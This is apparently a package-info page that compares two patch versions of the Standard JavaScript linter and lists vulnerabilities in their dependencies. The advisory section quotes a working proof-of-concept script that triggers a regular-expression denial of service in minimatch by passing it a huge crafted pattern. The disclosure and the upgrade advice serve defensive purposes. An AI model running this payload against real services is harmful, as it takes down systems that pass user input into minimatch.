Standard version 2.1.1 is a minor patch release following closely on the heels of version 2.1.0. Both are iterations of the popular JavaScript Standard Style linter, designed to automatically format and enforce consistent code style across JavaScript projects. Examining the package data reveals the key changes between these two versions. Version 2.1.1 includes newly added extend.js and run-parallel as devDependencies, while these are missing from version 2.1.0. For developers, this likely signifies internal improvements related to the development workflow, testing, or build process of the Standard package itself. These dependencies would likely be used in automating tasks like merging configurations or running tests in parallel.
Both 2.1.0 and 2.1.1 share identical core dependencies, including linters like eslint and jshint, file matching utilities like glob and minimatch, alongside other crucial packages for code analysis and manipulation. This means the core style checking and enforcement functionality remains consistent between the two releases. The patch introduces no breaking changes to the API or basic usage, easing the upgrade path for existing Standard users. Developers can confidently upgrade to 2.1.1 to benefit from potential bug fixes or optimized tooling without the need to adjust their existing configurations. The updates streamline the development experience ensuring an efficient build process, while maintaining the core style-checking functionality.
All the vulnerabilities related to the version 2.1.1 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.